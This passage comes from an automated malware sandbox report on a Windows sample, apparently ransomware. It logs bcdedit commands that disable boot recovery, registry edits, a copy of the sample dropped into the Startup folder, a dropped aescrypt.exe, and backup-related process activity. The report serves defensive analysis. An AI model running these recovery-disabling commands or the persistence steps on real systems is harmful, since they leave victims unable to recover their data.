                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit offJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled noJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} optionsedit off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} bootems no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {current} advancedoptions off
                      Uses cmd line tools excessively to alter registry or file dataShow sources
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exeJump to dropped file
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeFile created: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the startup folderShow sources
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeJump to dropped file
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe\:Zone.Identifier:$DATAJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Creates files inside the volume driver (system volume information)Show sources
                      Source: C:\Windows\System32\wbengine.exeFile created: C:\System Volume Information\WindowsImageBackup
                      Source: C:\Windows\System32\wbem\WMIC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeWindow / User API: threadDelayed 7605Jump to behavior
                      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 872Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeWindow / User API: threadDelayed 6351
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\19BE.tmp\aescrypt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\539A.tmp\aescrypt.exeJump to dropped file
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe TID: 5920Thread sleep time: -76050s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe TID: 6644Thread sleep time: -63510s >= -30000s
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeThread sleep count: Count: 7605 delay: -10Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exeThread sleep count: Count: 6351 delay: -10
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\Jump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmpJump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                      Source: C:\Users\user\Desktop\53c0505a_by_Libranalysis.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c9
                      Source: vds.exe, 0000001B.00000003.283933336.0000024E664B9000.00000004.00000001.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: Syntax: WBADMIN GET VIRTUALMACHINES
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: registering the VM with the Hyper-V management service.
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: vds.exe, 0000001B.00000003.283962195.0000024E664B9000.00000004.00000001.sdmpBinary or memory string: age#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001f400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6b
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
                      Source: WMIC.exe, 00000003.00000002.237288804.000001A65A1C0000.00000002.00000001.sdmp, bcdedit.exe, 00000007.00000002.242958078.000002802FE50000.00000002.00000001.sdmp, bcdedit.exe, 00000008.00000002.244504468.000001EA6AD70000.00000002.00000001.sdmp, bcdedit.exe, 00000009.00000002.246002891.0000021E1A4F0000.00000002.00000001.sdmp, bcdedit.exe, 0000000A.00000002.247775415.0000014B2FDD0000.00000002.00000001.sdmp, bcdedit.exe, 0000000C.00000002.249593598.000002394C300000.00000002.00000001.sdmp, WMIC.exe, 0000000E.00000002.255443468.000001B620480000.00000002.00000001.sdmp, WMIC.exe, 00000018.00000002.273124159.00000196AAED0000.00000002.00000001.sdmp, bcdedit.exe, 0000001D.00000002.278767439.000002A082370000.00000002.00000001.sdmp, bcdedit.exe, 0000001E.00000002.280690168.0000023F88970000.00000002.00000001.sdmp, bcdedit.exe, 00000020.00000002.283380643.000001809D2A0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.284369028.0000020E66630000.00000002.00000001.sdmp, bcdedit.exe, 00000024.00000002.285789419.00000267125F0000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.287715528.00000262F21D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: -items:{<VolumesToRecover> | <AppsToRecover> | <VirtualMachinesToRecover> | <FilesOrFoldersToRecover>}
                      Source: vds.exe, 0000001B.00000003.283933336.0000024E664B9000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: An error occurred while preparing to back up Hyper-V data.
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: GET VIRTUALMACHINES -- Lists current Hyper-V virtual machines.
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: Description: Lists the Hyper-V virtual machines that are present on the system.
                      Source: vds.exe, 0000001B.00000003.283926075.0000024E664C1000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: bcdedit.exe, 00000020.00000002.283366469.000001809D1A9000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual S
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: Either the Hyper-V role is not installed or there are no VMs configured on the
                      Source: bcdedit.exe, 00000009.00000002.245978545.0000021E1A3B9000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROg
                      Source: vds.exe, 0000001B.00000003.283827685.0000024E664B9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},gR
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}fb8b}U
                      Source: bcdedit.exe, 00000007.00000002.242929915.000002802FC59000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual S<=6}A
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: different after recovery. After recovery is complete use Hyper-V Manager to
                      Source: vds.exe, 0000001B.00000003.285185228.0000024E664D5000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-,U0P
                      Source: vds.exe, 0000001B.00000003.283909622.0000024E664BA000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}23T8P
                      Source: vds.exe, 0000001B.00000003.285671935.0000024E664D5000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: VMware SATA CD00}
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: VMware
                      Source: vds.exe, 0000001B.00000003.285683016.0000024E664D7000.00000004.00000001.sdmpBinary or memory string: #cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l\4&23686003&0&1PCI\VEN_8086&DEV_07E0&SUBSYS_07E015AD&REV_00\4&bbf9765&0&1088
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: -If -itemtype is HyperV, you can specify VirtualMachine's name
                      Source: WMIC.exe, 00000003.00000002.237288804.000001A65A1C0000.00000002.00000001.sdmp, bcdedit.exe, 00000007.00000002.242958078.000002802FE50000.00000002.00000001.sdmp, bcdedit.exe, 00000008.00000002.244504468.000001EA6AD70000.00000002.00000001.sdmp, bcdedit.exe, 00000009.00000002.246002891.0000021E1A4F0000.00000002.00000001.sdmp, bcdedit.exe, 0000000A.00000002.247775415.0000014B2FDD0000.00000002.00000001.sdmp, bcdedit.exe, 0000000C.00000002.249593598.000002394C300000.00000002.00000001.sdmp, WMIC.exe, 0000000E.00000002.255443468.000001B620480000.00000002.00000001.sdmp, WMIC.exe, 00000018.00000002.273124159.00000196AAED0000.00000002.00000001.sdmp, bcdedit.exe, 0000001D.00000002.278767439.000002A082370000.00000002.00000001.sdmp, bcdedit.exe, 0000001E.00000002.280690168.0000023F88970000.00000002.00000001.sdmp, bcdedit.exe, 00000020.00000002.283380643.000001809D2A0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.284369028.0000020E66630000.00000002.00000001.sdmp, bcdedit.exe, 00000024.00000002.285789419.00000267125F0000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.287715528.00000262F21D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: WMIC.exe, 00000003.00000002.237288804.000001A65A1C0000.00000002.00000001.sdmp, bcdedit.exe, 00000007.00000002.242958078.000002802FE50000.00000002.00000001.sdmp, bcdedit.exe, 00000008.00000002.244504468.000001EA6AD70000.00000002.00000001.sdmp, bcdedit.exe, 00000009.00000002.246002891.0000021E1A4F0000.00000002.00000001.sdmp, bcdedit.exe, 0000000A.00000002.247775415.0000014B2FDD0000.00000002.00000001.sdmp, bcdedit.exe, 0000000C.00000002.249593598.000002394C300000.00000002.00000001.sdmp, WMIC.exe, 0000000E.00000002.255443468.000001B620480000.00000002.00000001.sdmp, WMIC.exe, 00000018.00000002.273124159.00000196AAED0000.00000002.00000001.sdmp, bcdedit.exe, 0000001D.00000002.278767439.000002A082370000.00000002.00000001.sdmp, bcdedit.exe, 0000001E.00000002.280690168.0000023F88970000.00000002.00000001.sdmp, bcdedit.exe, 00000020.00000002.283380643.000001809D2A0000.00000002.00000001.sdmp, reg.exe, 00000023.00000002.284369028.0000020E66630000.00000002.00000001.sdmp, bcdedit.exe, 00000024.00000002.285789419.00000267125F0000.00000002.00000001.sdmp, reg.exe, 00000026.00000002.287715528.00000262F21D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: vds.exe, 0000001B.00000003.283949104.0000024E664C1000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&0000
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: ERROR - The Hyper-V component '%1' is specified more than once. If there
                      Source: vds.exe, 0000001B.00000003.283821386.0000024E664B1000.00000004.00000001.sdmpBinary or memory string: \\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001f400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}+
                      Source: bcdedit.exe, 00000020.00000002.283372862.000001809D1AC000.00000004.00000020.sdmpBinary or memory string: pEFI VMware Virtual SATA CDROM Drive (0.0)
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: providing the component identifier. You can use "wbadmin get virtualmachines"
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: to list relevant info for Hyper-V components.
                      Source: vds.exe, 0000001B.00000002.503680328.0000024E66469000.00000004.00000020.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000<n[
                      Source: vds.exe, 0000001B.00000003.285976537.0000024E664C3000.00000004.00000001.sdmpBinary or memory string: si#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}22[9
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: Cluster service, and Hyper-V for more information.
                      Source: vds.exe, 0000001B.00000003.285874747.0000024E664D1000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000003.284020625.0000024E664B9000.00000004.00000001.sdmpBinary or memory string: age#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{7f108a28-9833-4b3b-b780-2c6b5fa5c062}\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\storage#volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6b
                      Source: vds.exe, 0000001B.00000003.285167048.0000024E664D5000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3gR
                      Source: wbadmin.exe, 00000017.00000002.283036373.00000236845A0000.00000002.00000001.sdmpBinary or memory string: ERROR - The Hyper-V component '%1' specified is invalid.
                      Source: vds.exe, 0000001B.00000003.285663975.0000024E664E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: vds.exe, 0000001B.00000002.504245917.0000024E66485000.00000004.00000020.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000f
